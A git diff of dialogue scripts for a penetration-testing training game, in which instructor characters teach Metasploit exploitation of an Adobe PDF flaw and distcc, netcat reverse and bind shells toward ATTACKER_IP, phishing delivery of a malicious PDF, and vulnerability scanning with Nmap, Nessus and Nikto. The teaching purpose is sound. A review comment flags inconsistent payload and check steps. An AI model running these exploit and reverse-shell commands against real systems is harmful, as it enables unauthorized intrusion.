You use the multi/handler exploit: + + Penetration Testing Instructor: use exploit/multi/handler + + Penetration Testing Instructor: set payload windows/meterpreter/reverse_tcp + + Penetration Testing Instructor: set LHOST YOUR_IP + + Penetration Testing Instructor: set LPORT YOUR_PORT (must match what you used in the PDF) + + Penetration Testing Instructor: Then run it and leave it listening. When the victim opens the PDF and clicks through, you'll get a shell! + + ~ instructor_rapport += 5 + ++ [How would I deliver this PDF to a victim?] + Penetration Testing Instructor: In a real penetration test, you might host it on a web server and send a phishing email with a link. + + Penetration Testing Instructor: For the lab, you can start Apache web server and host the PDF there. + + Penetration Testing Instructor: Create a share directory: sudo mkdir /var/www/html/share + + Penetration Testing Instructor: Copy your PDF there: sudo cp /home/kali/.msf4/local/timetable.pdf /var/www/html/share/ + + Penetration Testing Instructor: Start Apache: sudo service apache2 start + + Penetration Testing Instructor: Then the victim can browse to http://YOUR_IP/share/timetable.pdf + + ~ instructor_rapport += 5 + +- -> vulnerability_hub + +=== remote_exploits === +Penetration Testing Instructor: Remote exploits are even more dangerous because they target network services directly exposed to the Internet. + +~ instructor_rapport += 5 + +Penetration Testing Instructor: No social engineering required - if the vulnerable service is accessible, you can often compromise it without any user interaction! + +Penetration Testing Instructor: A great example is the Distcc vulnerability (CVE-2004-2687). Distcc is a program to distribute compilation of C/C++ code across systems on a network. + ++ [What makes Distcc vulnerable?] + Penetration Testing Instructor: Distcc has a documented security issue where anyone who can connect to the port can execute arbitrary commands as the distcc user. 
+ + Penetration Testing Instructor: There's no authentication, no authorization checks. If you can reach the port, you can run commands. It's that simple. + + Penetration Testing Instructor: This is a design flaw - the software was built for trusted networks and doesn't include any security controls. + + ~ instructor_rapport += 5 + ++ [How do I exploit Distcc with Metasploit?] + Penetration Testing Instructor: The exploit module is exploit/unix/misc/distcc_exec. Let me walk you through it: + + Penetration Testing Instructor: First, use the exploit: use exploit/unix/misc/distcc_exec + + Penetration Testing Instructor: Set the target: set RHOST VICTIM_IP + + Penetration Testing Instructor: Choose a payload: set PAYLOAD cmd/unix/reverse + + Penetration Testing Instructor: Configure your listener: set LHOST YOUR_IP and set LPORT YOUR_PORT + + Penetration Testing Instructor: Then launch: exploit + + Penetration Testing Instructor: Unlike the PDF exploit, msfconsole automatically starts the reverse shell handler for remote exploits! + + ~ instructor_rapport += 5 + ++ [Can I check if a target is vulnerable first?] + Penetration Testing Instructor: Great thinking! Some Metasploit exploits support a "check" command. + + Penetration Testing Instructor: After setting your options, run "check" to see if the target appears vulnerable. + + Penetration Testing Instructor: Not all exploits support this, and it's not 100% reliable, but it's worth trying. + + Penetration Testing Instructor: For Distcc specifically, the check function isn't supported, but trying it doesn't hurt. + + ~ instructor_rapport += 5 + ++ [What level of access do I get?] + Penetration Testing Instructor: With Distcc, you typically get user-level access as the "distccd" user. + + Penetration Testing Instructor: You won't have root (administrator) access initially, but you can access anything that user can access. 
+ + Penetration Testing Instructor: From there, you might attempt privilege escalation to gain root access, which is often the ultimate goal on Unix systems. + + Penetration Testing Instructor: Even without root, a compromised user account can cause significant damage. + + ~ instructor_rapport += 5 + ++ [How can I make the shell more usable?] + Penetration Testing Instructor: The initial shell from cmd/unix/reverse is quite basic. You can upgrade it to an interactive shell: + + Penetration Testing Instructor: Run: python -c 'import pty; pty.spawn("/bin/bash")' + + Penetration Testing Instructor: This spawns a proper bash shell with better command line editing and behavior. + + Penetration Testing Instructor: Then you'll have a more normal feeling shell prompt to work with. + + ~ instructor_rapport += 5 + +- -> vulnerability_hub + +=== commands_reference === +Penetration Testing Instructor: Let me give you a comprehensive commands reference for this lab. + +~ instructor_rapport += 5 + +Penetration Testing Instructor: **Listing Metasploit Payloads:** + +Penetration Testing Instructor: msfvenom -l payload | less + +Penetration Testing Instructor: **Bind Shell Simulation with Netcat:** + +Penetration Testing Instructor: On victim: nc.exe -l -p 31337 -e cmd.exe -vv + +Penetration Testing Instructor: On attacker: nc VICTIM_IP 31337 + ++ [Show me reverse shell commands] + Penetration Testing Instructor: **Reverse Shell with Netcat:** + + Penetration Testing Instructor: On attacker: nc -l -p 53 -vv + + Penetration Testing Instructor: On victim: nc.exe ATTACKER_IP 53 -e cmd.exe -vv + + ~ instructor_rapport += 3 + ++ [Show me msfconsole basics] + Penetration Testing Instructor: **Msfconsole Basics:** + + Penetration Testing Instructor: Start console: msfconsole + + Penetration Testing Instructor: Get help: help + + Penetration Testing Instructor: List exploits: show exploits + + Penetration Testing Instructor: List payloads: show payloads + + Penetration Testing Instructor: 
Get exploit info: info exploit/path/to/exploit + + Penetration Testing Instructor: Select exploit: use exploit/path/to/exploit + + Penetration Testing Instructor: Show options: show options + + Penetration Testing Instructor: Set option: set OPTION_NAME value + + Penetration Testing Instructor: Go back: back + + Penetration Testing Instructor: Run exploit: exploit or run + + ~ instructor_rapport += 3 + ++ [Show me the Adobe PDF exploit commands] + Penetration Testing Instructor: **Adobe PDF Exploit (CVE-2010-1240):** + + Penetration Testing Instructor: use exploit/windows/fileformat/adobe_pdf_embedded_exe + + Penetration Testing Instructor: set FILENAME timetable.pdf + + Penetration Testing Instructor: set PAYLOAD windows/shell/reverse_tcp + + Penetration Testing Instructor: set LHOST YOUR_KALI_IP + + Penetration Testing Instructor: set LPORT 4444 + + Penetration Testing Instructor: run + + Penetration Testing Instructor: **Set up handler:** + + Penetration Testing Instructor: use exploit/multi/handler + + Penetration Testing Instructor: set payload windows/meterpreter/reverse_tcp + + Penetration Testing Instructor: set LHOST YOUR_KALI_IP + + Penetration Testing Instructor: set LPORT 4444 + + Penetration Testing Instructor: run + + ~ instructor_rapport += 3 + ++ [Show me the Distcc exploit commands] + Penetration Testing Instructor: **Distcc Remote Exploit (CVE-2004-2687):** + + Penetration Testing Instructor: use exploit/unix/misc/distcc_exec + + Penetration Testing Instructor: set RHOST VICTIM_IP + + Penetration Testing Instructor: set PAYLOAD cmd/unix/reverse + + Penetration Testing Instructor: set LHOST YOUR_KALI_IP + + Penetration Testing Instructor: set LPORT 4444 + + Penetration Testing Instructor: check (to see if target is vulnerable) + + Penetration Testing Instructor: exploit + + Penetration Testing Instructor: **Upgrade to interactive shell:** + + Penetration Testing Instructor: python -c 'import pty; pty.spawn("/bin/bash")' + + ~ instructor_rapport += 
3 + ++ [Show me web server setup for hosting payloads] + Penetration Testing Instructor: **Web Server Setup:** + + Penetration Testing Instructor: Create share directory: sudo mkdir /var/www/html/share + + Penetration Testing Instructor: Copy payload: sudo cp /home/kali/.msf4/local/filename.pdf /var/www/html/share/ + + Penetration Testing Instructor: Start Apache: sudo service apache2 start + + Penetration Testing Instructor: Access from victim: http://KALI_IP/share/filename.pdf + + ~ instructor_rapport += 3 + ++ [Show me useful post-exploitation commands] + Penetration Testing Instructor: **Post-Exploitation Commands:** + + Penetration Testing Instructor: Windows: whoami, dir, net user, ipconfig, systeminfo + + Penetration Testing Instructor: Linux: whoami, ls -la, uname -a, ifconfig, cat /etc/passwd + + Penetration Testing Instructor: Navigate: cd DIRECTORY + + Penetration Testing Instructor: Create file: echo TEXT > filename.txt + + Penetration Testing Instructor: Open browser (Windows): explorer "https://example.com" + + ~ instructor_rapport += 3 + ++ [Show me how to find network IPs] + Penetration Testing Instructor: **Finding IP Addresses:** + + Penetration Testing Instructor: On Kali: ifconfig or hostname -I + + Penetration Testing Instructor: On Windows: ipconfig + + Penetration Testing Instructor: Note the host-only network interfaces that start with the same 3 octets. + + ~ instructor_rapport += 3 + +- -> vulnerability_hub + +=== challenge_tips === +Penetration Testing Instructor: Let me give you some practical tips for succeeding in the challenge. + +~ instructor_rapport += 5 + +Penetration Testing Instructor: **For the Adobe PDF exploit:** + +Penetration Testing Instructor: Make sure you set up the handler BEFORE the victim opens the PDF. The reverse shell will try to connect immediately. + +Penetration Testing Instructor: The LHOST and LPORT must match between the PDF generation and the handler. 
+ +Penetration Testing Instructor: On Windows, use Adobe Reader specifically, not Chrome's built-in PDF viewer, since we're exploiting Adobe Reader's vulnerability. + ++ [What if the PDF exploit doesn't work?] + Penetration Testing Instructor: First, check that Windows firewall isn't blocking the connection. Usually it won't block outbound connections, but double-check. + + Penetration Testing Instructor: Verify your IP addresses are correct - use the host-only network addresses that start with the same three octets. + + Penetration Testing Instructor: Make sure your handler is actually running when the victim opens the PDF. + + Penetration Testing Instructor: Check that you're opening with Adobe Reader, not another PDF viewer. + + ~ instructor_rapport += 5 + ++ [Tips for the Distcc exploit?] + Penetration Testing Instructor: The Linux victim VM is the server running Distcc. You can't open it directly - that's expected. + + Penetration Testing Instructor: The IP address typically ends in .3 and starts with the same three octets as your Kali and Windows VMs. + + Penetration Testing Instructor: After you get shell access, remember you can upgrade to an interactive shell with that Python one-liner. + + Penetration Testing Instructor: Look in the distccd user's home directory for the flag file. + + ~ instructor_rapport += 5 + ++ [General troubleshooting advice?] + Penetration Testing Instructor: Always double-check your IP addresses. Getting the wrong IP is the most common mistake. + + Penetration Testing Instructor: Pay attention to whether you need LHOST (local host - your Kali IP) or RHOST (remote host - victim IP). + + Penetration Testing Instructor: If something doesn't work, run "show options" again to verify all settings before running the exploit. + + Penetration Testing Instructor: Use ifconfig to check your Kali IP and ipconfig to check Windows IP. + + ~ instructor_rapport += 5 + ++ [What should I do once I have shell access?] 
+ Penetration Testing Instructor: First, verify you have access by running basic commands like "whoami" and "dir" or "ls". + + Penetration Testing Instructor: Navigate to the user's home directory and look for flag files. + + Penetration Testing Instructor: For the PDF exploit, the flag might be on the Desktop or in the user's home folder. + + Penetration Testing Instructor: For Distcc, look in /home for user directories, then search for flag files. + + Penetration Testing Instructor: Read the flag with "cat flag" or "type flag" on Windows. + + ~ instructor_rapport += 5 + +- -> vulnerability_hub + +=== ready_for_practice === +Penetration Testing Instructor: Excellent! You're ready to start the practical exercises. + +~ instructor_rapport += 10 +~ exploitation_ethics += 10 + +Penetration Testing Instructor: Remember: the knowledge you've gained about vulnerabilities and exploitation is powerful. Use it only for authorized security testing, penetration testing engagements, and defensive purposes. + +Penetration Testing Instructor: Understanding how attacks work makes you a better defender. But wielding these tools without authorization is both illegal and unethical. + +Penetration Testing Instructor: In the lab environment, you'll practice both local exploits (the Adobe PDF vulnerability) and remote exploits (the Distcc vulnerability). + ++ [Any final advice before I start?] + Penetration Testing Instructor: Take your time and read the error messages carefully. Metasploit is verbose and will tell you what went wrong. + + Penetration Testing Instructor: Use tab completion and command history to work more efficiently. + + Penetration Testing Instructor: Document what you're doing as you go - it helps with troubleshooting and writing reports later. + + Penetration Testing Instructor: Most importantly: if you get stuck, check "show options" to verify your settings, and make sure your IP addresses are correct. 
+ + Penetration Testing Instructor: Good luck, Agent {player_name}. This is where theory meets practice. + + ~ instructor_rapport += 10 + +- -> vulnerability_hub + +-> END diff --git a/story_design/ink/game_scenarios/vulnerability_analysis.ink b/story_design/ink/game_scenarios/vulnerability_analysis.ink new file mode 100644 index 0000000..0826e37 --- /dev/null +++ b/story_design/ink/game_scenarios/vulnerability_analysis.ink 
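Review bot: The commands_reference knot lists "check (to see if target is vulnerable)" as a step for the Distcc exploit, but the remote_exploits dialogue above says the check function isn't supported for distcc_exec; either drop that step from the reference or qualify it the same way ("not supported for this module, but harmless to try") so the two sections don't contradict each other. Related inconsistency in the Adobe PDF walkthrough: the PDF is generated with "set PAYLOAD windows/shell/reverse_tcp" while the handler is configured with "set payload windows/meterpreter/reverse_tcp", yet challenge_tips tells the player settings "must match between the PDF generation and the handler"; either use the same payload string in both places or add one line explaining that both share the reverse_tcp stager, so the handler's stage decides what runs.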
@@ -0,0 +1,562 @@ +// Vulnerability Analysis Lab Sheet +// Based on HacktivityLabSheets: introducing_attacks/8_vulnerability_analysis.md +// Author: Z. Cliffe Schreuders, Anatoliy Gorbenko, Tom Shaw +// License: CC BY-SA 4.0 + +// Global persistent state +VAR instructor_rapport = 0 +VAR vuln_scanning_mastery = 0 + +// External variables +EXTERNAL player_name + +=== start === +Vulnerability Assessment Specialist: Welcome, Agent {player_name}. I'm your instructor for Vulnerability Analysis and Assessment. + +~ instructor_rapport = 0 +~ vuln_scanning_mastery = 0 + +Vulnerability Assessment Specialist: Vulnerability assessment is critical for efficiently identifying security weaknesses in systems before attackers find them. + +Vulnerability Assessment Specialist: While penetration testing involves manually researching and exploiting vulnerabilities, vulnerability scanning is an automated approach that quickly surveys systems for known security issues. + +Vulnerability Assessment Specialist: You'll learn to use industry-standard tools like Nmap NSE, Nessus, and Nikto - understanding their strengths, limitations, and when to use each. + +Vulnerability Assessment Specialist: Remember: these are powerful reconnaissance tools. Use them only on systems you're authorized to assess. + +~ vuln_scanning_mastery += 10 + +-> vuln_scan_hub + +=== vuln_scan_hub === +Vulnerability Assessment Specialist: What aspect of vulnerability assessment would you like to explore? + ++ [What is vulnerability scanning?] 
+ -> vuln_scanning_intro ++ [Vulnerability scanning vs penetration testing] + -> scanning_vs_pentesting ++ [Nmap Scripting Engine (NSE)] + -> nmap_nse ++ [Using Nessus vulnerability scanner] + -> nessus_scanner ++ [Web vulnerability scanning with Nikto] + -> nikto_scanner ++ [Limitations of automated tools] + -> tool_limitations ++ [Show me the commands reference] + -> commands_reference ++ [Practical challenge tips] + -> challenge_tips ++ [I'm ready for the lab exercises] + -> ready_for_practice ++ [That's all for now] + #exit_conversation + -> END + +=== vuln_scanning_intro === +Vulnerability Assessment Specialist: Vulnerability scanning is an automated approach to identifying security weaknesses in systems. + +~ instructor_rapport += 5 + +Vulnerability Assessment Specialist: Scanners typically perform or import network scans like port scans and service identification, then automatically check whether detected services contain known vulnerabilities. + +Vulnerability Assessment Specialist: They compare detected service versions against databases of known vulnerabilities - similar to what you did manually using CVE databases. + ++ [How do vulnerability scanners work?] + Vulnerability Assessment Specialist: Most vulnerability scanners follow a standard process: + + Vulnerability Assessment Specialist: First, they conduct or import a port scan to identify running services and their versions. + + Vulnerability Assessment Specialist: Then they compare this information against databases of known vulnerabilities for those specific versions. + + Vulnerability Assessment Specialist: Many also send probes to confirm vulnerabilities actually exist, not just assume based on version numbers. + + Vulnerability Assessment Specialist: Some tests are potentially dangerous and might crash services, so most scanners offer a "safe mode" to avoid risky checks. + + ~ instructor_rapport += 5 + ++ [Why use automated scanning?] 
+ Vulnerability Assessment Specialist: Automated scanning has several advantages: + + Vulnerability Assessment Specialist: It's fast - scanning hundreds of systems in the time it would take to manually test one. + + Vulnerability Assessment Specialist: It's comprehensive - checking for thousands of known vulnerabilities systematically. + + Vulnerability Assessment Specialist: It's repeatable - you can regularly rescan to catch newly introduced vulnerabilities. + + Vulnerability Assessment Specialist: It reduces the risk of human error or overlooking obvious issues. + + Vulnerability Assessment Specialist: However, it also has significant limitations we'll discuss. + + ~ instructor_rapport += 5 + +- -> vuln_scan_hub + +=== scanning_vs_pentesting === +Vulnerability Assessment Specialist: Penetration testing and vulnerability scanning are complementary but distinct approaches. + +~ instructor_rapport += 5 + +Vulnerability Assessment Specialist: Penetration testing involves manual research, planning, and actual exploitation of vulnerabilities. It's deeper but slower. + +Vulnerability Assessment Specialist: Vulnerability scanning is automated, faster, and broader but shallower. + ++ [What are the advantages of penetration testing?] + Vulnerability Assessment Specialist: Penetration testing has several key advantages: + + Vulnerability Assessment Specialist: Very few false positives - if a tester successfully exploits a vulnerability, it's definitely real. + + Vulnerability Assessment Specialist: Testers can chain vulnerabilities together in creative ways automated tools can't imagine. + + Vulnerability Assessment Specialist: Human intuition can spot logical flaws and business logic vulnerabilities that scanners miss. + + Vulnerability Assessment Specialist: However, there's always risk that an exploit may cause unintentional damage. + + Vulnerability Assessment Specialist: And even skilled testers might miss something obvious if they're checking things manually. 
+ + ~ instructor_rapport += 5 + ++ [What are the advantages of vulnerability scanning?] + Vulnerability Assessment Specialist: Vulnerability scanning excels at: + + Vulnerability Assessment Specialist: Speed - scanning entire networks in hours instead of days or weeks. + + Vulnerability Assessment Specialist: Coverage - systematically checking for thousands of known vulnerabilities. + + Vulnerability Assessment Specialist: Safety - tests can be configured to avoid dangerous probes that might crash services. + + Vulnerability Assessment Specialist: Consistency - same tests run the same way every time. + + Vulnerability Assessment Specialist: Cost-effectiveness - after initial setup, scanning is cheap to repeat regularly. + + ~ instructor_rapport += 5 + ++ [Which approach is better?] + Vulnerability Assessment Specialist: The best security assessments use both! + + Vulnerability Assessment Specialist: Start with vulnerability scanning to quickly identify low-hanging fruit and obvious issues. + + Vulnerability Assessment Specialist: Then use penetration testing to go deeper, verify critical findings, and test how vulnerabilities can be chained together. + + Vulnerability Assessment Specialist: Many organizations do frequent vulnerability scans with periodic penetration tests. + + Vulnerability Assessment Specialist: Think of scanning as your smoke detector, and penetration testing as your fire drill. + + ~ instructor_rapport += 5 + +- -> vuln_scan_hub + +=== nmap_nse === +Vulnerability Assessment Specialist: The Nmap Scripting Engine (NSE) extends Nmap's capabilities beyond simple port scanning. + +~ instructor_rapport += 5 + +Vulnerability Assessment Specialist: NSE allows Nmap to be extended with scripts that add service detection, vulnerability checking, and even exploitation capabilities. + +Vulnerability Assessment Specialist: Nmap is distributed with hundreds of scripts written in the Lua programming language. + ++ [How do I use Nmap scripts?] 
+ Vulnerability Assessment Specialist: The simplest way is to use the default script set: + + Vulnerability Assessment Specialist: nmap -sC TARGET + + Vulnerability Assessment Specialist: This runs all scripts categorized as "default" - safe, useful, and not overly intrusive. + + Vulnerability Assessment Specialist: For vulnerability scanning specifically: nmap --script vuln -sV TARGET + + Vulnerability Assessment Specialist: The vuln category includes scripts that check for known vulnerabilities. + + Vulnerability Assessment Specialist: You can also run specific scripts: nmap --script distcc-cve2004-2687 TARGET + + ~ instructor_rapport += 5 + ++ [Where are NSE scripts located?] + Vulnerability Assessment Specialist: All NSE scripts are stored in /usr/share/nmap/scripts/ + + Vulnerability Assessment Specialist: You can list them with: ls /usr/share/nmap/scripts/ + + Vulnerability Assessment Specialist: Each script is a .nse file. Looking at their code shows what they check for. + + Vulnerability Assessment Specialist: For example, distcc-cve2004-2687.nse checks for the specific Distcc vulnerability. + + Vulnerability Assessment Specialist: The scripts are organized by category: auth, broadcast, default, discovery, dos, exploit, fuzzer, intrusive, malware, safe, version, and vuln. + + ~ instructor_rapport += 5 + ++ [How effective is NSE for vulnerability detection?] + Vulnerability Assessment Specialist: NSE vulnerability detection is useful but limited. + + Vulnerability Assessment Specialist: The vuln scripts check for specific, well-known vulnerabilities - they're not comprehensive like dedicated vulnerability scanners. + + Vulnerability Assessment Specialist: However, they're very useful for quick checks and are actively maintained by the Nmap community. + + Vulnerability Assessment Specialist: Think of NSE as a lightweight vulnerability scanner - good for initial assessment but not a replacement for tools like Nessus. 
+ + ~ instructor_rapport += 5 + +- -> vuln_scan_hub + +=== nessus_scanner === +Vulnerability Assessment Specialist: Nessus by Tenable is one of the most popular commercial vulnerability scanners in the industry. + +~ instructor_rapport += 5 + +Vulnerability Assessment Specialist: It uses a client-server architecture with a web interface, and can scan for tens of thousands of vulnerabilities. + +Vulnerability Assessment Specialist: Vulnerability tests are written in NASL (Nessus Attack Scripting Language), and subscribers receive regular updates to vulnerability signatures. + ++ [How do I use Nessus?] + Vulnerability Assessment Specialist: Access Nessus through its web interface at https://localhost:8834 + + Vulnerability Assessment Specialist: Login with the credentials provided (typically nessusadmin) + + Vulnerability Assessment Specialist: Click "New Scan" and choose a scan template - Basic Network Scan is a good starting point. + + Vulnerability Assessment Specialist: Enter your target IP addresses and click "Launch" + + Vulnerability Assessment Specialist: Nessus will systematically test the targets and present results categorized by severity: Critical, High, Medium, Low, Info. + + ~ instructor_rapport += 5 + ++ [What scan templates does Nessus offer?] + Vulnerability Assessment Specialist: Nessus offers various scan profiles for different purposes: + + Vulnerability Assessment Specialist: Basic Network Scan - Good general-purpose scan for network services + + Vulnerability Assessment Specialist: Advanced Scan - Allows detailed customization of what to check + + Vulnerability Assessment Specialist: Web Application Tests - Focused on web vulnerabilities + + Vulnerability Assessment Specialist: Compliance scans - Check systems against security policy standards + + Vulnerability Assessment Specialist: Each template determines which vulnerability checks run and how aggressive the scanning is. + + ~ instructor_rapport += 5 + ++ [How do I interpret Nessus results?] 
+ Vulnerability Assessment Specialist: Nessus presents results with detailed information for each finding: + + Vulnerability Assessment Specialist: Severity rating (Critical to Info) helps prioritize remediation + + Vulnerability Assessment Specialist: CVE identifiers link to official vulnerability databases + + Vulnerability Assessment Specialist: Plugin descriptions explain what was found and why it's a problem + + Vulnerability Assessment Specialist: Solution sections provide remediation guidance + + Vulnerability Assessment Specialist: References link to additional information and exploit code + + Vulnerability Assessment Specialist: You can export results as HTML, PDF, or XML for reports or import into Metasploit. + + ~ instructor_rapport += 5 + ++ [What's the difference between Basic and Advanced scans?] + Vulnerability Assessment Specialist: Basic scans use default settings optimized for speed and safety. + + Vulnerability Assessment Specialist: Advanced scans let you customize: + + Vulnerability Assessment Specialist: Which vulnerability checks to run + + Vulnerability Assessment Specialist: Whether to perform "thorough tests" (slower but more comprehensive) + + Vulnerability Assessment Specialist: Whether to show potential false alarms + + Vulnerability Assessment Specialist: Advanced scans typically find more vulnerabilities but take longer and carry slightly higher risk of disruption. + + ~ instructor_rapport += 5 + +- -> vuln_scan_hub + +=== nikto_scanner === +Vulnerability Assessment Specialist: Nikto is a command-line web vulnerability scanner focused exclusively on web servers and applications. + +~ instructor_rapport += 5 + +Vulnerability Assessment Specialist: While general scanners like Nmap and Nessus check web servers, Nikto specializes in web-specific vulnerabilities. + +Vulnerability Assessment Specialist: It scans for over 6,000 web security issues including dangerous CGI scripts, misconfigurations, and known vulnerable software. 
+ ++ [How do I use Nikto?] + Vulnerability Assessment Specialist: Nikto is straightforward to use: + + Vulnerability Assessment Specialist: nikto -host TARGET_IP + + Vulnerability Assessment Specialist: Nikto will automatically detect web servers on common ports and scan them. + + Vulnerability Assessment Specialist: You can also specify a port: nikto -host TARGET_IP -port 8080 + + Vulnerability Assessment Specialist: Or scan SSL/TLS sites: nikto -host TARGET_IP -ssl + + Vulnerability Assessment Specialist: The output shows each issue found with references to more information. + + ~ instructor_rapport += 5 + ++ [What kinds of issues does Nikto detect?] + Vulnerability Assessment Specialist: Nikto looks for web-specific vulnerabilities: + + Vulnerability Assessment Specialist: Outdated server software with known exploits + + Vulnerability Assessment Specialist: Dangerous default files and directories (admin panels, config files) + + Vulnerability Assessment Specialist: Server misconfigurations (directory listings, verbose errors) + + Vulnerability Assessment Specialist: Known vulnerable web applications and frameworks + + Vulnerability Assessment Specialist: Interesting HTTP headers that might reveal information + + ~ instructor_rapport += 5 + ++ [How does Nikto compare to Nessus for web scanning?] + Vulnerability Assessment Specialist: Nikto and Nessus overlap but have different strengths: + + Vulnerability Assessment Specialist: Nikto is specialized - it goes deeper on web-specific issues. + + Vulnerability Assessment Specialist: Nessus is broader - it checks web servers along with everything else. + + Vulnerability Assessment Specialist: Nikto is free and open source; Nessus commercial versions are quite expensive. + + Vulnerability Assessment Specialist: For comprehensive web testing, use both! They often find different issues. 
+ + ~ instructor_rapport += 5 + +- -> vuln_scan_hub + +=== tool_limitations === +Vulnerability Assessment Specialist: Understanding the limitations of automated tools is crucial for effective security assessment. + +~ instructor_rapport += 5 + +Vulnerability Assessment Specialist: No single tool finds everything. Different tools detect different vulnerabilities based on their databases and testing methods. + +Vulnerability Assessment Specialist: All automated tools produce false positives and false negatives. + ++ [What are false positives and false negatives?] + Vulnerability Assessment Specialist: False positives are vulnerabilities reported that don't actually exist. + + Vulnerability Assessment Specialist: For example, a scanner might think software is vulnerable based on version number, but a patch was backported. + + Vulnerability Assessment Specialist: False negatives are real vulnerabilities that scanners miss completely. + + Vulnerability Assessment Specialist: This happens when vulnerabilities aren't in the scanner's database, or tests aren't configured to detect them. + + Vulnerability Assessment Specialist: Penetration testing helps confirm scanner findings and find what was missed. + + ~ instructor_rapport += 5 + ++ [Why don't scanners detect all vulnerabilities?] + Vulnerability Assessment Specialist: Several factors limit scanner effectiveness: + + Vulnerability Assessment Specialist: Signature-based detection only finds KNOWN vulnerabilities in their databases. + + Vulnerability Assessment Specialist: Zero-day vulnerabilities (unknown to vendors) won't be detected. + + Vulnerability Assessment Specialist: Configuration issues and logical flaws often can't be detected automatically. + + Vulnerability Assessment Specialist: Scanners might not test certain services if they're on non-standard ports. + + Vulnerability Assessment Specialist: Safe mode settings might skip tests that could confirm vulnerabilities. 
+ + ~ instructor_rapport += 5 + ++ [How can different scanners miss different things?] + Vulnerability Assessment Specialist: Each scanner has different vulnerability databases and detection methods: + + Vulnerability Assessment Specialist: Nmap NSE has a limited set of vulnerability scripts focused on network services. + + Vulnerability Assessment Specialist: Nessus has an extensive database of checks but might not detect web-specific issues. + + Vulnerability Assessment Specialist: Nikto specializes in web vulnerabilities but doesn't check other services. + + Vulnerability Assessment Specialist: This is why security professionals run multiple scanners - each catches things others miss. + + Vulnerability Assessment Specialist: Even then, manual testing is essential to find what all the scanners missed! + + ~ instructor_rapport += 5 + +- -> vuln_scan_hub + +=== commands_reference === +Vulnerability Assessment Specialist: Let me provide a comprehensive vulnerability scanning commands reference. 
+ +~ instructor_rapport += 5 + +Vulnerability Assessment Specialist: **Nmap NSE Scanning:** + +Vulnerability Assessment Specialist: Default script scan: nmap -sC TARGET + +Vulnerability Assessment Specialist: Vulnerability scripts: nmap --script vuln -sV TARGET + +Vulnerability Assessment Specialist: Specific ports: nmap --script vuln -sV -p 1-5000 TARGET + +Vulnerability Assessment Specialist: Specific script: nmap --script distcc-cve2004-2687 TARGET + +Vulnerability Assessment Specialist: List available scripts: ls /usr/share/nmap/scripts/ + +Vulnerability Assessment Specialist: View script code: cat /usr/share/nmap/scripts/SCRIPT_NAME.nse + ++ [Show me Nessus workflow] + Vulnerability Assessment Specialist: **Nessus Scanning:** + + Vulnerability Assessment Specialist: Access web interface: https://localhost:8834 + + Vulnerability Assessment Specialist: Login: nessusadmin / nessusadmin01 + + Vulnerability Assessment Specialist: **Workflow:** + + Vulnerability Assessment Specialist: 1. Click "New Scan" + + Vulnerability Assessment Specialist: 2. Select scan template (Basic Network Scan or Advanced Scan) + + Vulnerability Assessment Specialist: 3. Enter scan name and target IP addresses + + Vulnerability Assessment Specialist: 4. For Advanced scans, configure: Thorough tests, Show potential false alarms + + Vulnerability Assessment Specialist: 5. Click "Save" then "Launch" + + Vulnerability Assessment Specialist: 6. View results: Click scan name → "Vulnerabilities" tab + + Vulnerability Assessment Specialist: 7. 
Export results: "Export" → choose format (HTML, PDF, CSV, XML) + + ~ instructor_rapport += 3 + ++ [Show me Nikto commands] + Vulnerability Assessment Specialist: **Nikto Web Scanning:** + + Vulnerability Assessment Specialist: Basic scan: nikto -host TARGET_IP + + Vulnerability Assessment Specialist: Specific port: nikto -host TARGET_IP -port 8080 + + Vulnerability Assessment Specialist: SSL/HTTPS: nikto -host TARGET_IP -ssl + + Vulnerability Assessment Specialist: Multiple ports: nikto -host TARGET_IP -port 80,443,8080 + + Vulnerability Assessment Specialist: **Tips:** + + Vulnerability Assessment Specialist: Output can be verbose - redirect to file: nikto -host TARGET > nikto_results.txt + + Vulnerability Assessment Specialist: Check specific paths: nikto -host TARGET -root /admin/ + + ~ instructor_rapport += 3 + ++ [Show me comparison workflow] + Vulnerability Assessment Specialist: **Comprehensive Assessment Workflow:** + + Vulnerability Assessment Specialist: 1. Start with Nmap service detection: nmap -sV -p- TARGET + + Vulnerability Assessment Specialist: 2. Run Nmap vuln scripts: nmap --script vuln -sV TARGET + + Vulnerability Assessment Specialist: 3. Launch Nessus Basic scan for broad coverage + + Vulnerability Assessment Specialist: 4. Launch Nessus Advanced scan with thorough tests + + Vulnerability Assessment Specialist: 5. For web servers, run Nikto: nikto -host TARGET + + Vulnerability Assessment Specialist: 6. Compare results - note what each tool found uniquely + + Vulnerability Assessment Specialist: 7. Verify critical findings with manual testing or exploitation + + ~ instructor_rapport += 3 + +- -> vuln_scan_hub + +=== challenge_tips === +Vulnerability Assessment Specialist: Let me give you practical tips for the vulnerability assessment challenges. + +~ instructor_rapport += 5 + +Vulnerability Assessment Specialist: **Running Scans:** + +Vulnerability Assessment Specialist: Start Nmap vuln scans early - they take time to complete. 
+ +Vulnerability Assessment Specialist: While Nmap runs, start your Nessus scans in parallel. + +Vulnerability Assessment Specialist: If Nessus is still initializing plugins, skip ahead to Nikto and come back. + ++ [Tips for comparing results?] + Vulnerability Assessment Specialist: Document what each tool finds: + + Vulnerability Assessment Specialist: Note which vulnerabilities Nmap NSE detects + + Vulnerability Assessment Specialist: Count vulnerabilities by severity in Nessus (Critical, High, Medium, Low) + + Vulnerability Assessment Specialist: Compare Basic vs Advanced Nessus scans - how many more does Advanced find? + + Vulnerability Assessment Specialist: Check what Nikto finds that the others missed + + Vulnerability Assessment Specialist: The lab has MULTIPLE exploitable vulnerabilities - see how many each tool detects. + + ~ instructor_rapport += 5 + ++ [Tips for exploiting found vulnerabilities?] + Vulnerability Assessment Specialist: The lab includes vulnerabilities you've seen before (like Distcc) and new ones. + + Vulnerability Assessment Specialist: Try exploiting vulnerabilities detected by the scanners to confirm they're real. + + Vulnerability Assessment Specialist: There's a NEW privilege escalation vulnerability this week - a different sudo vulnerability. + + Vulnerability Assessment Specialist: This time you don't know the user's password, so the previous sudo exploit won't work! + + Vulnerability Assessment Specialist: Look for CVE-2021-3156 (Baron Samedit) - affects sudo versions 1.8.2-1.8.31p2 and 1.9.0-1.9.5p1 + + ~ instructor_rapport += 5 + ++ [Tips for privilege escalation?] + Vulnerability Assessment Specialist: After exploiting a service, check the sudo version: sudo --version + + Vulnerability Assessment Specialist: The Baron Samedit vulnerability (CVE-2021-3156) might be present. + + Vulnerability Assessment Specialist: This exploit works differently - it doesn't require knowing a password! 
